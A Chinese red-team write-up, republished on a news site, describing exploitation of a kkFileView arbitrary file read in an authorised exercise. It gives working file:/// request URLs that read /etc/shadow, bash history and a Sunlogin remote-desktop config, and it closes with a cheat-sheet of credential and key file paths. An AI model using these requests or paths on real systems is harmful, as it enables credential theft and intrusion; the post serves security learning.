Redian新闻
>
某次攻防演练中对任意文件读取漏洞的利用

某次攻防演练中对任意文件读取漏洞的利用

科技


声明:本次演练中,所有测试设备均由主办方提供,所有流量均有留档可审计,所有操作均在授权下完成,所有数据在结束后均已安全销毁。

攻防演练参加的越多,越发感觉打点越来越难。。。之前shiro反序列化之类可以无脑getshell的漏洞还挺多的,今年已经鲜有遇到了。这是上次遇到某目标的打点过程,记录一下。

过程记录

其他不多说了,直接复述一下对目标ip的测试过程。

简单扫了一眼,资产挺多,但是没啥能利用的(技术不到位)。挨页点着翻,看到了kkfileview,这个之前也遇到过,但是也没多想过。这次搜了下它的漏洞,结果发现还挺多的,顿时有一种错过好几个shell的感觉。。。。。

任意文件读取漏洞测试

看到存在任意文件读取,就想通过这个漏洞看能不能利用下。用户历史命令记录文件

http://ip/getCorsFile?urlPath=file:///../../root/.bash_history

账户信息

http://ip/getCorsFile?urlPath=file:///../..//etc/passwd

读取账户密码文件,加密解不开。。。

http://ip/getCorsFile?urlPath=file:///../..//etc/shadow/

测试很多个常见路径都没什么收获,然后另外一个哥们找到了些东西。查看网站目录

http://ip/getCorsFile?urlPath=file:///data/

在某个目录下找到了一个jar包

通过逆向jar包,发现jar包中BOOT-INF\classes\application-dev.yml文件存在数据库账号密码:

这是阿里云数据库的账号密码

阿里云上也有若干收获,这里就不详述了。重点来了,经过若干次翻目录,竟然找到了向日葵的配置文件。。

http://IP/getCorsFile?urlPath=file:////etc/orayconfig.conf

encry_pwd(本机验证码) fastcode(本机识别码),注意faskcode值第一个英文字母不要,只需要后面数字即可。值为明文保存所以不需要解密

fastcode=k****
encry_pwd=****

然后使用解密脚本Sunflower_get_Password解密

pip3 install unicorn

向日葵登录后就可以在内网直接Tscan扫描了,不过没有很多东西。另外记一下任意文件读取的路径,以后可能用得到

## windows

C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息

## linux

/root/.ssh/authorized_keys //如需登录到远程主机,需要到.ssh目录下,新建authorized_keys文件,并将id_rsa.pub内容复制进去
/root/.ssh/id_rsa //ssh私钥,ssh公钥是id_rsa.pub
/root/.ssh/id_ras.keystore //记录每个访问计算机用户的公钥
/root/.ssh/known_hosts
//ssh会把每个访问过计算机的公钥(public key)都记录在~/.ssh/known_hosts。当下次访问相同计算机时,OpenSSH会核对公钥。如果公钥不同,OpenSSH会发出警告, 避免你受到DNS Hijack之类的攻击。
/etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/etc/my.cnf //mysql 配置文件
/etc/httpd/conf/httpd.conf // Apache配置文件
/etc/redhat-release 系统版本 
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/var/lib/mlocate/mlocate.db //全文件路径
/proc/self/fd/fd[0-9]*(文件标识符)
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/porc/self/cmdline //当前进程的cmdline参数
/proc/sched_debug 配置文件可以看到当前运行的进程并可以获得对应进程的pid
/proc/pid/cmdline   则可以看到对应pid进程的完整命令行。
/proc/net/fib_trie   内网IP
/proc/self/environ   环境变量
/proc/self/loginuid   当前用户

总结

打点的过程还是要仔细,任何小细节都不能放过。一开始通过这个IP想着也就有个任意文件读取和SSRF,经过一步步的翻目录后找到的资产还不算少,可能总共得分不多,但也算给自己涨涨经验,以后渗透不能只贪快,也要细致。

工具下载

Sunflower_get_Password脚本已同步至知识星球。


往期推荐

敏感信息泄露

潮影在线免杀平台上线了

自动化渗透测试工具开发实践

【红蓝对抗】利用CS进行内网横向

一个Go版(更强大)的TideFinger

SRC资产导航监测平台Tsrc上线了

新潮信息-Tide安全团队2022年度总结

记一次实战攻防(打点-Edr-内网-横向-Vcenter)

E

N

D


知识星球产品及服务

团队内部平台:潮汐在线指纹识别平台 | 潮听漏洞情报平台 | 潮巡资产管理与威胁监测平台 | 潮汐网络空间资产测绘 | 潮声漏洞检测平台 | 在线免杀平台 | CTF练习平台 | 物联网固件检测平台 | SRC资产监控平台  | ......


星球分享方向:Web安全 | 红蓝对抗 | 移动安全 | 应急响应 | 工控安全 | 物联网安全 | 密码学 | 人工智能 | ctf 等方面的沟通及分享


星球知识wiki:红蓝对抗 | 漏洞武器库 | 远控免杀 | 移动安全 | 物联网安全 | 代码审计 | CTF | 工控安全 | 应急响应 | 人工智能 | 密码学 | CobaltStrike | 安全测试用例 | ......


星球网盘资料:安全法律法规 | 安全认证资料 | 代码审计 | 渗透安全工具 | 工控安全工具 | 移动安全工具 | 物联网安全 | 其它安全文库合辑  | ......

扫码加入一起学习吧~

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
永远不要对任何人期待太高使用doop识别最近commons text漏洞的污点信息流国防部:不针对任何国家ChatGPT推出“联网模式”!可直接读取网页内容,网友:更好用了稻盛和夫:极致的利他,才是最好的利己冷却的不止季节(48)— 致富之路“不针对中国,不针对任何国家”恐怖!美军驱逐舰密集阵系统训练中锁定民航客机6种方式读取Springboot的配置浣溪沙:云中鸿雁画诗行特朗普党内“头号对手”参加大选;台搞民防演习,竟找上80岁老人;员工每天“带薪如厕”3-6小时被解雇 | 每日大新闻iOS最新安全漏洞被曝光,黑客可执行任意恶意代码,中招者不计其数!“遭受超过179次攻击”“这充其量是一场空洞的胜利”令人窒息的攻防,这对话放之四海皆好用2023HVV安全攻防知识库不对任何成年人的情绪负责AI读取大脑,还破译了人们的内心独白!我的秘密会被它看光吗?日本创意文具盘点,设计脑洞大开!■■■■□□□□□□ 正在读取最高$20,000!OpenAI 将向报告ChatGPT漏洞的用户,发钱啦!如何高效实现文件传输:小文件采用零拷贝、大文件采用异步io+直接io钻石吧华人被警察击毙视频公布:他对任何人都没威胁,凭什么击毙他?不针对任何特定国家!商务部回应管制镓、锗相关物项出口乘着思想的翅膀 - 人类何时被AI凌驾读心术成现实:使用ChatGPT背后的技术读取人类大脑中的思想,我们现在需要担心吗?如何高效实现文件传输:小文件用零拷贝、大文件用异步io+直接io乱停车的小心了!纽约将允许市民对任何非法停放汽车拍照举报​毛尖|三十年过去,为什么我们只剩空洞的三生三世剧?双林奇案录第三部之天禅寺:第二十一节长篇小说《如絮》第一百一十四章 旧金山-2004年 失眠对任何人好,都不是一场交易​别的简报|校园枪击预防演习,老师让学生给自己写讣告争议!钻石吧华人被警察击毙视频公布:他对任何人都没威胁,凭什么击毙他?曝光!澳洲移民局漏洞百出,大批留学生利用签证漏洞,靠这种手段拿PR,从大学跑路...
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。